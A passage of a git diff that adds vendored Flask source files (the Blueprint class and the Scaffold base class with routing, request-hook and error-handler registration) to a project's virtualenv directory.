f"{self.name_prefix}.{self.name}.{endpoint}".lstrip("."), + view_func, + defaults=defaults, + **options, + ) + + +class Blueprint(Scaffold): + """Represents a blueprint, a collection of routes and other + app-related functions that can be registered on a real application + later. + + A blueprint is an object that allows defining application functions + without requiring an application object ahead of time. It uses the + same decorators as :class:`~flask.Flask`, but defers the need for an + application by recording them for later registration. + + Decorating a function with a blueprint creates a deferred function + that is called with :class:`~flask.blueprints.BlueprintSetupState` + when the blueprint is registered on an application. + + See :doc:`/blueprints` for more information. + + :param name: The name of the blueprint. Will be prepended to each + endpoint name. + :param import_name: The name of the blueprint package, usually + ``__name__``. This helps locate the ``root_path`` for the + blueprint. + :param static_folder: A folder with static files that should be + served by the blueprint's static route. The path is relative to + the blueprint's root path. Blueprint static files are disabled + by default. + :param static_url_path: The url to serve static files from. + Defaults to ``static_folder``. If the blueprint does not have + a ``url_prefix``, the app's static route will take precedence, + and the blueprint's static files won't be accessible. + :param template_folder: A folder with templates that should be added + to the app's template search path. The path is relative to the + blueprint's root path. Blueprint templates are disabled by + default. Blueprint templates have a lower precedence than those + in the app's templates folder. + :param url_prefix: A path to prepend to all of the blueprint's URLs, + to make them distinct from the rest of the app's routes. + :param subdomain: A subdomain that blueprint routes will match on by + default. + :param url_defaults: A dict of default values that blueprint routes + will receive by default. + :param root_path: By default, the blueprint will automatically set + this based on ``import_name``. In certain situations this + automatic detection can fail, so the path can be specified + manually instead. + + .. versionchanged:: 1.1.0 + Blueprints have a ``cli`` group to register nested CLI commands. + The ``cli_group`` parameter controls the name of the group under + the ``flask`` command. + + .. versionadded:: 0.7 + """ + + _got_registered_once = False + + def __init__( + self, + name: str, + import_name: str, + static_folder: str | os.PathLike | None = None, + static_url_path: str | None = None, + template_folder: str | os.PathLike | None = None, + url_prefix: str | None = None, + subdomain: str | None = None, + url_defaults: dict | None = None, + root_path: str | None = None, + cli_group: str | None = _sentinel, # type: ignore + ): + super().__init__( + import_name=import_name, + static_folder=static_folder, + static_url_path=static_url_path, + template_folder=template_folder, + root_path=root_path, + ) + + if not name: + raise ValueError("'name' may not be empty.") + + if "." in name: + raise ValueError("'name' may not contain a dot '.' character.") + + self.name = name + self.url_prefix = url_prefix + self.subdomain = subdomain + self.deferred_functions: list[DeferredSetupFunction] = [] + + if url_defaults is None: + url_defaults = {} + + self.url_values_defaults = url_defaults + self.cli_group = cli_group + self._blueprints: list[tuple[Blueprint, dict]] = [] + + def _check_setup_finished(self, f_name: str) -> None: + if self._got_registered_once: + raise AssertionError( + f"The setup method '{f_name}' can no longer be called on the blueprint" + f" '{self.name}'. It has already been registered at least once, any" + " changes will not be applied consistently.\n" + "Make sure all imports, decorators, functions, etc. needed to set up" + " the blueprint are done before registering it." + ) + + @setupmethod + def record(self, func: t.Callable) -> None: + """Registers a function that is called when the blueprint is + registered on the application. This function is called with the + state as argument as returned by the :meth:`make_setup_state` + method. + """ + self.deferred_functions.append(func) + + @setupmethod + def record_once(self, func: t.Callable) -> None: + """Works like :meth:`record` but wraps the function in another + function that will ensure the function is only called once. If the + blueprint is registered a second time on the application, the + function passed is not called. + """ + + def wrapper(state: BlueprintSetupState) -> None: + if state.first_registration: + func(state) + + self.record(update_wrapper(wrapper, func)) + + def make_setup_state( + self, app: App, options: dict, first_registration: bool = False + ) -> BlueprintSetupState: + """Creates an instance of :meth:`~flask.blueprints.BlueprintSetupState` + object that is later passed to the register callback functions. + Subclasses can override this to return a subclass of the setup state. + """ + return BlueprintSetupState(self, app, options, first_registration) + + @setupmethod + def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None: + """Register a :class:`~flask.Blueprint` on this blueprint. Keyword + arguments passed to this method will override the defaults set + on the blueprint. + + .. versionchanged:: 2.0.1 + The ``name`` option can be used to change the (pre-dotted) + name the blueprint is registered with. This allows the same + blueprint to be registered multiple times with unique names + for ``url_for``. + + .. versionadded:: 2.0 + """ + if blueprint is self: + raise ValueError("Cannot register a blueprint on itself") + self._blueprints.append((blueprint, options)) + + def register(self, app: App, options: dict) -> None: + """Called by :meth:`Flask.register_blueprint` to register all + views and callbacks registered on the blueprint with the + application. Creates a :class:`.BlueprintSetupState` and calls + each :meth:`record` callback with it. + + :param app: The application this blueprint is being registered + with. + :param options: Keyword arguments forwarded from + :meth:`~Flask.register_blueprint`. + + .. versionchanged:: 2.3 + Nested blueprints now correctly apply subdomains. + + .. versionchanged:: 2.1 + Registering the same blueprint with the same name multiple + times is an error. + + .. versionchanged:: 2.0.1 + Nested blueprints are registered with their dotted name. + This allows different blueprints with the same name to be + nested at different locations. + + .. versionchanged:: 2.0.1 + The ``name`` option can be used to change the (pre-dotted) + name the blueprint is registered with. This allows the same + blueprint to be registered multiple times with unique names + for ``url_for``. + """ + name_prefix = options.get("name_prefix", "") + self_name = options.get("name", self.name) + name = f"{name_prefix}.{self_name}".lstrip(".") + + if name in app.blueprints: + bp_desc = "this" if app.blueprints[name] is self else "a different" + existing_at = f" '{name}'" if self_name != name else "" + + raise ValueError( + f"The name '{self_name}' is already registered for" + f" {bp_desc} blueprint{existing_at}. Use 'name=' to" + f" provide a unique name." + ) + + first_bp_registration = not any(bp is self for bp in app.blueprints.values()) + first_name_registration = name not in app.blueprints + + app.blueprints[name] = self + self._got_registered_once = True + state = self.make_setup_state(app, options, first_bp_registration) + + if self.has_static_folder: + state.add_url_rule( + f"{self.static_url_path}/", + view_func=self.send_static_file, # type: ignore[attr-defined] + endpoint="static", + ) + + # Merge blueprint data into parent. + if first_bp_registration or first_name_registration: + self._merge_blueprint_funcs(app, name) + + for deferred in self.deferred_functions: + deferred(state) + + cli_resolved_group = options.get("cli_group", self.cli_group) + + if self.cli.commands: + if cli_resolved_group is None: + app.cli.commands.update(self.cli.commands) + elif cli_resolved_group is _sentinel: + self.cli.name = name + app.cli.add_command(self.cli) + else: + self.cli.name = cli_resolved_group + app.cli.add_command(self.cli) + + for blueprint, bp_options in self._blueprints: + bp_options = bp_options.copy() + bp_url_prefix = bp_options.get("url_prefix") + bp_subdomain = bp_options.get("subdomain") + + if bp_subdomain is None: + bp_subdomain = blueprint.subdomain + + if state.subdomain is not None and bp_subdomain is not None: + bp_options["subdomain"] = bp_subdomain + "." + state.subdomain + elif bp_subdomain is not None: + bp_options["subdomain"] = bp_subdomain + elif state.subdomain is not None: + bp_options["subdomain"] = state.subdomain + + if bp_url_prefix is None: + bp_url_prefix = blueprint.url_prefix + + if state.url_prefix is not None and bp_url_prefix is not None: + bp_options["url_prefix"] = ( + state.url_prefix.rstrip("/") + "/" + bp_url_prefix.lstrip("/") + ) + elif bp_url_prefix is not None: + bp_options["url_prefix"] = bp_url_prefix + elif state.url_prefix is not None: + bp_options["url_prefix"] = state.url_prefix + + bp_options["name_prefix"] = name + blueprint.register(app, bp_options) + + def _merge_blueprint_funcs(self, app: App, name: str) -> None: + def extend(bp_dict, parent_dict): + for key, values in bp_dict.items(): + key = name if key is None else f"{name}.{key}" + parent_dict[key].extend(values) + + for key, value in self.error_handler_spec.items(): + key = name if key is None else f"{name}.{key}" + value = defaultdict( + dict, + { + code: {exc_class: func for exc_class, func in code_values.items()} + for code, code_values in value.items() + }, + ) + app.error_handler_spec[key] = value + + for endpoint, func in self.view_functions.items(): + app.view_functions[endpoint] = func + + extend(self.before_request_funcs, app.before_request_funcs) + extend(self.after_request_funcs, app.after_request_funcs) + extend( + self.teardown_request_funcs, + app.teardown_request_funcs, + ) + extend(self.url_default_functions, app.url_default_functions) + extend(self.url_value_preprocessors, app.url_value_preprocessors) + extend(self.template_context_processors, app.template_context_processors) + + @setupmethod + def add_url_rule( + self, + rule: str, + endpoint: str | None = None, + view_func: ft.RouteCallable | None = None, + provide_automatic_options: bool | None = None, + **options: t.Any, + ) -> None: + """Register a URL rule with the blueprint. See :meth:`.Flask.add_url_rule` for + full documentation. + + The URL rule is prefixed with the blueprint's URL prefix. The endpoint name, + used with :func:`url_for`, is prefixed with the blueprint's name. + """ + if endpoint and "." in endpoint: + raise ValueError("'endpoint' may not contain a dot '.' character.") + + if view_func and hasattr(view_func, "__name__") and "." in view_func.__name__: + raise ValueError("'view_func' name may not contain a dot '.' character.") + + self.record( + lambda s: s.add_url_rule( + rule, + endpoint, + view_func, + provide_automatic_options=provide_automatic_options, + **options, + ) + ) + + @setupmethod + def app_template_filter( + self, name: str | None = None + ) -> t.Callable[[T_template_filter], T_template_filter]: + """Register a template filter, available in any template rendered by the + application. Equivalent to :meth:`.Flask.template_filter`. + + :param name: the optional name of the filter, otherwise the + function name will be used. + """ + + def decorator(f: T_template_filter) -> T_template_filter: + self.add_app_template_filter(f, name=name) + return f + + return decorator + + @setupmethod + def add_app_template_filter( + self, f: ft.TemplateFilterCallable, name: str | None = None + ) -> None: + """Register a template filter, available in any template rendered by the + application. Works like the :meth:`app_template_filter` decorator. Equivalent to + :meth:`.Flask.add_template_filter`. + + :param name: the optional name of the filter, otherwise the + function name will be used. + """ + + def register_template(state: BlueprintSetupState) -> None: + state.app.jinja_env.filters[name or f.__name__] = f + + self.record_once(register_template) + + @setupmethod + def app_template_test( + self, name: str | None = None + ) -> t.Callable[[T_template_test], T_template_test]: + """Register a template test, available in any template rendered by the + application. Equivalent to :meth:`.Flask.template_test`. + + .. versionadded:: 0.10 + + :param name: the optional name of the test, otherwise the + function name will be used. + """ + + def decorator(f: T_template_test) -> T_template_test: + self.add_app_template_test(f, name=name) + return f + + return decorator + + @setupmethod + def add_app_template_test( + self, f: ft.TemplateTestCallable, name: str | None = None + ) -> None: + """Register a template test, available in any template rendered by the + application. Works like the :meth:`app_template_test` decorator. Equivalent to + :meth:`.Flask.add_template_test`. + + .. versionadded:: 0.10 + + :param name: the optional name of the test, otherwise the + function name will be used. + """ + + def register_template(state: BlueprintSetupState) -> None: + state.app.jinja_env.tests[name or f.__name__] = f + + self.record_once(register_template) + + @setupmethod + def app_template_global( + self, name: str | None = None + ) -> t.Callable[[T_template_global], T_template_global]: + """Register a template global, available in any template rendered by the + application. Equivalent to :meth:`.Flask.template_global`. + + .. versionadded:: 0.10 + + :param name: the optional name of the global, otherwise the + function name will be used. + """ + + def decorator(f: T_template_global) -> T_template_global: + self.add_app_template_global(f, name=name) + return f + + return decorator + + @setupmethod + def add_app_template_global( + self, f: ft.TemplateGlobalCallable, name: str | None = None + ) -> None: + """Register a template global, available in any template rendered by the + application. Works like the :meth:`app_template_global` decorator. Equivalent to + :meth:`.Flask.add_template_global`. + + .. versionadded:: 0.10 + + :param name: the optional name of the global, otherwise the + function name will be used. + """ + + def register_template(state: BlueprintSetupState) -> None: + state.app.jinja_env.globals[name or f.__name__] = f + + self.record_once(register_template) + + @setupmethod + def before_app_request(self, f: T_before_request) -> T_before_request: + """Like :meth:`before_request`, but before every request, not only those handled + by the blueprint. Equivalent to :meth:`.Flask.before_request`. + """ + self.record_once( + lambda s: s.app.before_request_funcs.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def after_app_request(self, f: T_after_request) -> T_after_request: + """Like :meth:`after_request`, but after every request, not only those handled + by the blueprint. Equivalent to :meth:`.Flask.after_request`. + """ + self.record_once( + lambda s: s.app.after_request_funcs.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def teardown_app_request(self, f: T_teardown) -> T_teardown: + """Like :meth:`teardown_request`, but after every request, not only those + handled by the blueprint. Equivalent to :meth:`.Flask.teardown_request`. + """ + self.record_once( + lambda s: s.app.teardown_request_funcs.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def app_context_processor( + self, f: T_template_context_processor + ) -> T_template_context_processor: + """Like :meth:`context_processor`, but for templates rendered by every view, not + only by the blueprint. Equivalent to :meth:`.Flask.context_processor`. + """ + self.record_once( + lambda s: s.app.template_context_processors.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def app_errorhandler( + self, code: type[Exception] | int + ) -> t.Callable[[T_error_handler], T_error_handler]: + """Like :meth:`errorhandler`, but for every request, not only those handled by + the blueprint. Equivalent to :meth:`.Flask.errorhandler`. + """ + + def decorator(f: T_error_handler) -> T_error_handler: + self.record_once(lambda s: s.app.errorhandler(code)(f)) + return f + + return decorator + + @setupmethod + def app_url_value_preprocessor( + self, f: T_url_value_preprocessor + ) -> T_url_value_preprocessor: + """Like :meth:`url_value_preprocessor`, but for every request, not only those + handled by the blueprint. Equivalent to :meth:`.Flask.url_value_preprocessor`. + """ + self.record_once( + lambda s: s.app.url_value_preprocessors.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def app_url_defaults(self, f: T_url_defaults) -> T_url_defaults: + """Like :meth:`url_defaults`, but for every request, not only those handled by + the blueprint. Equivalent to :meth:`.Flask.url_defaults`. + """ + self.record_once( + lambda s: s.app.url_default_functions.setdefault(None, []).append(f) + ) + return f diff --git a/env/Lib/site-packages/flask/sansio/scaffold.py b/env/Lib/site-packages/flask/sansio/scaffold.py new file mode 100644 index 00000000..a43f6fd7 --- /dev/null +++ b/env/Lib/site-packages/flask/sansio/scaffold.py @@ -0,0 +1,802 @@ +from __future__ import annotations + +import importlib.util +import os +import pathlib +import sys +import typing as t +from collections import defaultdict +from functools import update_wrapper + +from jinja2 import FileSystemLoader +from werkzeug.exceptions import default_exceptions +from werkzeug.exceptions import HTTPException +from werkzeug.utils import cached_property + +from .. import typing as ft +from ..cli import AppGroup +from ..helpers import get_root_path +from ..templating import _default_template_ctx_processor + +# a singleton sentinel value for parameter defaults +_sentinel = object() + +F = t.TypeVar("F", bound=t.Callable[..., t.Any]) +T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable) +T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable) +T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable) +T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) +T_template_context_processor = t.TypeVar( + "T_template_context_processor", bound=ft.TemplateContextProcessorCallable +) +T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable) +T_url_value_preprocessor = t.TypeVar( + "T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable +) +T_route = t.TypeVar("T_route", bound=ft.RouteCallable) + + +def setupmethod(f: F) -> F: + f_name = f.__name__ + + def wrapper_func(self, *args: t.Any, **kwargs: t.Any) -> t.Any: + self._check_setup_finished(f_name) + return f(self, *args, **kwargs) + + return t.cast(F, update_wrapper(wrapper_func, f)) + + +class Scaffold: + """Common behavior shared between :class:`~flask.Flask` and + :class:`~flask.blueprints.Blueprint`. + + :param import_name: The import name of the module where this object + is defined. Usually :attr:`__name__` should be used. + :param static_folder: Path to a folder of static files to serve. + If this is set, a static route will be added. + :param static_url_path: URL prefix for the static route. + :param template_folder: Path to a folder containing template files. + for rendering. If this is set, a Jinja loader will be added. + :param root_path: The path that static, template, and resource files + are relative to. Typically not set, it is discovered based on + the ``import_name``. + + .. versionadded:: 2.0 + """ + + name: str + _static_folder: str | None = None + _static_url_path: str | None = None + + def __init__( + self, + import_name: str, + static_folder: str | os.PathLike | None = None, + static_url_path: str | None = None, + template_folder: str | os.PathLike | None = None, + root_path: str | None = None, + ): + #: The name of the package or module that this object belongs + #: to. Do not change this once it is set by the constructor. + self.import_name = import_name + + self.static_folder = static_folder # type: ignore + self.static_url_path = static_url_path + + #: The path to the templates folder, relative to + #: :attr:`root_path`, to add to the template loader. ``None`` if + #: templates should not be added. + self.template_folder = template_folder + + if root_path is None: + root_path = get_root_path(self.import_name) + + #: Absolute path to the package on the filesystem. Used to look + #: up resources contained in the package. + self.root_path = root_path + + #: The Click command group for registering CLI commands for this + #: object. The commands are available from the ``flask`` command + #: once the application has been discovered and blueprints have + #: been registered. + self.cli = AppGroup() + + #: A dictionary mapping endpoint names to view functions. + #: + #: To register a view function, use the :meth:`route` decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.view_functions: dict[str, t.Callable] = {} + + #: A data structure of registered error handlers, in the format + #: ``{scope: {code: {class: handler}}}``. The ``scope`` key is + #: the name of a blueprint the handlers are active for, or + #: ``None`` for all requests. The ``code`` key is the HTTP + #: status code for ``HTTPException``, or ``None`` for + #: other exceptions. The innermost dictionary maps exception + #: classes to handler functions. + #: + #: To register an error handler, use the :meth:`errorhandler` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.error_handler_spec: dict[ + ft.AppOrBlueprintKey, + dict[int | None, dict[type[Exception], ft.ErrorHandlerCallable]], + ] = defaultdict(lambda: defaultdict(dict)) + + #: A data structure of functions to call at the beginning of + #: each request, in the format ``{scope: [functions]}``. The + #: ``scope`` key is the name of a blueprint the functions are + #: active for, or ``None`` for all requests. + #: + #: To register a function, use the :meth:`before_request` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.before_request_funcs: dict[ + ft.AppOrBlueprintKey, list[ft.BeforeRequestCallable] + ] = defaultdict(list) + + #: A data structure of functions to call at the end of each + #: request, in the format ``{scope: [functions]}``. The + #: ``scope`` key is the name of a blueprint the functions are + #: active for, or ``None`` for all requests. + #: + #: To register a function, use the :meth:`after_request` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.after_request_funcs: dict[ + ft.AppOrBlueprintKey, list[ft.AfterRequestCallable] + ] = defaultdict(list) + + #: A data structure of functions to call at the end of each + #: request even if an exception is raised, in the format + #: ``{scope: [functions]}``. The ``scope`` key is the name of a + #: blueprint the functions are active for, or ``None`` for all + #: requests. + #: + #: To register a function, use the :meth:`teardown_request` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.teardown_request_funcs: dict[ + ft.AppOrBlueprintKey, list[ft.TeardownCallable] + ] = defaultdict(list) + + #: A data structure of functions to call to pass extra context + #: values when rendering templates, in the format + #: ``{scope: [functions]}``. The ``scope`` key is the name of a + #: blueprint the functions are active for, or ``None`` for all + #: requests. + #: + #: To register a function, use the :meth:`context_processor` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.template_context_processors: dict[ + ft.AppOrBlueprintKey, list[ft.TemplateContextProcessorCallable] + ] = defaultdict(list, {None: [_default_template_ctx_processor]}) + + #: A data structure of functions to call to modify the keyword + #: arguments passed to the view function, in the format + #: ``{scope: [functions]}``. The ``scope`` key is the name of a + #: blueprint the functions are active for, or ``None`` for all + #: requests. + #: + #: To register a function, use the + #: :meth:`url_value_preprocessor` decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.url_value_preprocessors: dict[ + ft.AppOrBlueprintKey, + list[ft.URLValuePreprocessorCallable], + ] = defaultdict(list) + + #: A data structure of functions to call to modify the keyword + #: arguments when generating URLs, in the format + #: ``{scope: [functions]}``. The ``scope`` key is the name of a + #: blueprint the functions are active for, or ``None`` for all + #: requests. + #: + #: To register a function, use the :meth:`url_defaults` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.url_default_functions: dict[ + ft.AppOrBlueprintKey, list[ft.URLDefaultCallable] + ] = defaultdict(list) + + def __repr__(self) -> str: + return f"<{type(self).__name__} {self.name!r}>" + + def _check_setup_finished(self, f_name: str) -> None: + raise NotImplementedError + + @property + def static_folder(self) -> str | None: + """The absolute path to the configured static folder. ``None`` + if no static folder is set. + """ + if self._static_folder is not None: + return os.path.join(self.root_path, self._static_folder) + else: + return None + + @static_folder.setter + def static_folder(self, value: str | os.PathLike | None) -> None: + if value is not None: + value = os.fspath(value).rstrip(r"\/") + + self._static_folder = value + + @property + def has_static_folder(self) -> bool: + """``True`` if :attr:`static_folder` is set. + + .. versionadded:: 0.5 + """ + return self.static_folder is not None + + @property + def static_url_path(self) -> str | None: + """The URL prefix that the static route will be accessible from. + + If it was not configured during init, it is derived from + :attr:`static_folder`. + """ + if self._static_url_path is not None: + return self._static_url_path + + if self.static_folder is not None: + basename = os.path.basename(self.static_folder) + return f"/{basename}".rstrip("/") + + return None + + @static_url_path.setter + def static_url_path(self, value: str | None) -> None: + if value is not None: + value = value.rstrip("/") + + self._static_url_path = value + + @cached_property + def jinja_loader(self) -> FileSystemLoader | None: + """The Jinja loader for this object's templates. By default this + is a class :class:`jinja2.loaders.FileSystemLoader` to + :attr:`template_folder` if it is set. + + .. versionadded:: 0.5 + """ + if self.template_folder is not None: + return FileSystemLoader(os.path.join(self.root_path, self.template_folder)) + else: + return None + + def _method_route( + self, + method: str, + rule: str, + options: dict, + ) -> t.Callable[[T_route], T_route]: + if "methods" in options: + raise TypeError("Use the 'route' decorator to use the 'methods' argument.") + + return self.route(rule, methods=[method], **options) + + @setupmethod + def get(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["GET"]``. + + .. versionadded:: 2.0 + """ + return self._method_route("GET", rule, options) + + @setupmethod + def post(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["POST"]``. + + .. versionadded:: 2.0 + """ + return self._method_route("POST", rule, options) + + @setupmethod + def put(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["PUT"]``. + + .. versionadded:: 2.0 + """ + return self._method_route("PUT", rule, options) + + @setupmethod + def delete(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["DELETE"]``. + + .. versionadded:: 2.0 + """ + return self._method_route("DELETE", rule, options) + + @setupmethod + def patch(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["PATCH"]``. + + .. versionadded:: 2.0 + """ + return self._method_route("PATCH", rule, options) + + @setupmethod + def route(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Decorate a view function to register it with the given URL + rule and options. Calls :meth:`add_url_rule`, which has more + details about the implementation. + + .. code-block:: python + + @app.route("/") + def index(): + return "Hello, World!" + + See :ref:`url-route-registrations`. + + The endpoint name for the route defaults to the name of the view + function if the ``endpoint`` parameter isn't passed. + + The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` and + ``OPTIONS`` are added automatically. + + :param rule: The URL rule string. + :param options: Extra options passed to the + :class:`~werkzeug.routing.Rule` object. + """ + + def decorator(f: T_route) -> T_route: + endpoint = options.pop("endpoint", None) + self.add_url_rule(rule, endpoint, f, **options) + return f + + return decorator + + @setupmethod + def add_url_rule( + self, + rule: str, + endpoint: str | None = None, + view_func: ft.RouteCallable | None = None, + provide_automatic_options: bool | None = None, + **options: t.Any, + ) -> None: + """Register a rule for routing incoming requests and building + URLs. The :meth:`route` decorator is a shortcut to call this + with the ``view_func`` argument. These are equivalent: + + .. code-block:: python + + @app.route("/") + def index(): + ... + + .. code-block:: python + + def index(): + ... + + app.add_url_rule("/", view_func=index) + + See :ref:`url-route-registrations`. + + The endpoint name for the route defaults to the name of the view + function if the ``endpoint`` parameter isn't passed. An error + will be raised if a function has already been registered for the + endpoint. + + The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` is + always added automatically, and ``OPTIONS`` is added + automatically by default. + + ``view_func`` does not necessarily need to be passed, but if the + rule should participate in routing an endpoint name must be + associated with a view function at some point with the + :meth:`endpoint` decorator. + + .. code-block:: python + + app.add_url_rule("/", endpoint="index") + + @app.endpoint("index") + def index(): + ... + + If ``view_func`` has a ``required_methods`` attribute, those + methods are added to the passed and automatic methods. If it + has a ``provide_automatic_methods`` attribute, it is used as the + default if the parameter is not passed. + + :param rule: The URL rule string. + :param endpoint: The endpoint name to associate with the rule + and view function. Used when routing and building URLs. + Defaults to ``view_func.__name__``. + :param view_func: The view function to associate with the + endpoint name. + :param provide_automatic_options: Add the ``OPTIONS`` method and + respond to ``OPTIONS`` requests automatically. + :param options: Extra options passed to the + :class:`~werkzeug.routing.Rule` object. + """ + raise NotImplementedError + + @setupmethod + def endpoint(self, endpoint: str) -> t.Callable[[F], F]: + """Decorate a view function to register it for the given + endpoint. Used if a rule is added without a ``view_func`` with + :meth:`add_url_rule`. + + .. code-block:: python + + app.add_url_rule("/ex", endpoint="example") + + @app.endpoint("example") + def example(): + ... + + :param endpoint: The endpoint name to associate with the view + function. + """ + + def decorator(f: F) -> F: + self.view_functions[endpoint] = f + return f + + return decorator + + @setupmethod + def before_request(self, f: T_before_request) -> T_before_request: + """Register a function to run before each request. + + For example, this can be used to open a database connection, or + to load the logged in user from the session. + + .. code-block:: python + + @app.before_request + def load_user(): + if "user_id" in session: + g.user = db.session.get(session["user_id"]) + + The function will be called without any arguments. If it returns + a non-``None`` value, the value is handled as if it was the + return value from the view, and further request handling is + stopped. + + This is available on both app and blueprint objects. When used on an app, this + executes before every request. When used on a blueprint, this executes before + every request that the blueprint handles. To register with a blueprint and + execute before every request, use :meth:`.Blueprint.before_app_request`. + """ + self.before_request_funcs.setdefault(None, []).append(f) + return f + + @setupmethod + def after_request(self, f: T_after_request) -> T_after_request: + """Register a function to run after each request to this object. + + The function is called with the response object, and must return + a response object. This allows the functions to modify or + replace the response before it is sent. + + If a function raises an exception, any remaining + ``after_request`` functions will not be called. Therefore, this + should not be used for actions that must execute, such as to + close resources. Use :meth:`teardown_request` for that. + + This is available on both app and blueprint objects. When used on an app, this + executes after every request. When used on a blueprint, this executes after + every request that the blueprint handles. To register with a blueprint and + execute after every request, use :meth:`.Blueprint.after_app_request`. + """ + self.after_request_funcs.setdefault(None, []).append(f) + return f + + @setupmethod + def teardown_request(self, f: T_teardown) -> T_teardown: + """Register a function to be called when the request context is + popped. Typically this happens at the end of each request, but + contexts may be pushed manually as well during testing. + + .. code-block:: python + + with app.test_request_context(): + ... + + When the ``with`` block exits (or ``ctx.pop()`` is called), the + teardown functions are called just before the request context is + made inactive. + + When a teardown function was called because of an unhandled + exception it will be passed an error object. If an + :meth:`errorhandler` is registered, it will handle the exception + and the teardown will not receive it. + + Teardown functions must avoid raising exceptions. If they + execute code that might fail they must surround that code with a + ``try``/``except`` block and log any errors. + + The return values of teardown functions are ignored. + + This is available on both app and blueprint objects. When used on an app, this + executes after every request. When used on a blueprint, this executes after + every request that the blueprint handles. To register with a blueprint and + execute after every request, use :meth:`.Blueprint.teardown_app_request`. + """ + self.teardown_request_funcs.setdefault(None, []).append(f) + return f + + @setupmethod + def context_processor( + self, + f: T_template_context_processor, + ) -> T_template_context_processor: + """Registers a template context processor function. These functions run before + rendering a template. The keys of the returned dict are added as variables + available in the template. + + This is available on both app and blueprint objects. When used on an app, this + is called for every rendered template. When used on a blueprint, this is called + for templates rendered from the blueprint's views. To register with a blueprint + and affect every template, use :meth:`.Blueprint.app_context_processor`. + """ + self.template_context_processors[None].append(f) + return f + + @setupmethod + def url_value_preprocessor( + self, + f: T_url_value_preprocessor, + ) -> T_url_value_preprocessor: + """Register a URL value preprocessor function for all view + functions in the application. These functions will be called before the + :meth:`before_request` functions. + + The function can modify the values captured from the matched url before + they are passed to the view. For example, this can be used to pop a + common language code value and place it in ``g`` rather than pass it to + every view. + + The function is passed the endpoint name and values dict. The return + value is ignored. + + This is available on both app and blueprint objects. When used on an app, this + is called for every request. When used on a blueprint, this is called for + requests that the blueprint handles. To register with a blueprint and affect + every request, use :meth:`.Blueprint.app_url_value_preprocessor`. + """ + self.url_value_preprocessors[None].append(f) + return f + + @setupmethod + def url_defaults(self, f: T_url_defaults) -> T_url_defaults: + """Callback function for URL defaults for all view functions of the + application. It's called with the endpoint and values and should + update the values passed in place. + + This is available on both app and blueprint objects. When used on an app, this + is called for every request. When used on a blueprint, this is called for + requests that the blueprint handles. To register with a blueprint and affect + every request, use :meth:`.Blueprint.app_url_defaults`. + """ + self.url_default_functions[None].append(f) + return f + + @setupmethod + def errorhandler( + self, code_or_exception: type[Exception] | int + ) -> t.Callable[[T_error_handler], T_error_handler]: + """Register a function to handle errors by code or exception class. + + A decorator that is used to register a function given an + error code. Example:: + + @app.errorhandler(404) + def page_not_found(error): + return 'This page does not exist', 404 + + You can also register handlers for arbitrary exceptions:: + + @app.errorhandler(DatabaseError) + def special_exception_handler(error): + return 'Database connection failed', 500 + + This is available on both app and blueprint objects. When used on an app, this + can handle errors from every request. When used on a blueprint, this can handle + errors from requests that the blueprint handles. To register with a blueprint + and affect every request, use :meth:`.Blueprint.app_errorhandler`. + + .. versionadded:: 0.7 + Use :meth:`register_error_handler` instead of modifying + :attr:`error_handler_spec` directly, for application wide error + handlers. + + .. versionadded:: 0.7 + One can now additionally also register custom exception types + that do not necessarily have to be a subclass of the + :class:`~werkzeug.exceptions.HTTPException` class. + + :param code_or_exception: the code as integer for the handler, or + an arbitrary exception + """ + + def decorator(f: T_error_handler) -> T_error_handler: + self.register_error_handler(code_or_exception, f) + return f + + return decorator + + @setupmethod + def register_error_handler( + self, + code_or_exception: type[Exception] | int, + f: ft.ErrorHandlerCallable, + ) -> None: + """Alternative error attach function to the :meth:`errorhandler` + decorator that is more straightforward to use for non decorator + usage. + + .. versionadded:: 0.7 + """ + exc_class, code = self._get_exc_class_and_code(code_or_exception) + self.error_handler_spec[None][code][exc_class] = f + + @staticmethod + def _get_exc_class_and_code( + exc_class_or_code: type[Exception] | int, + ) -> tuple[type[Exception], int | None]: + """Get the exception class being handled. For HTTP status codes + or ``HTTPException`` subclasses, return both the exception and + status code. + + :param exc_class_or_code: Any exception class, or an HTTP status + code as an integer. + """ + exc_class: type[Exception] + + if isinstance(exc_class_or_code, int): + try: + exc_class = default_exceptions[exc_class_or_code] + except KeyError: + raise ValueError( + f"'{exc_class_or_code}' is not a recognized HTTP" + " error code. Use a subclass of HTTPException with" + " that code instead." + ) from None + else: + exc_class = exc_class_or_code + + if isinstance(exc_class, Exception): + raise TypeError( + f"{exc_class!r} is an instance, not a class. Handlers" + " can only be registered for Exception classes or HTTP" + " error codes." + 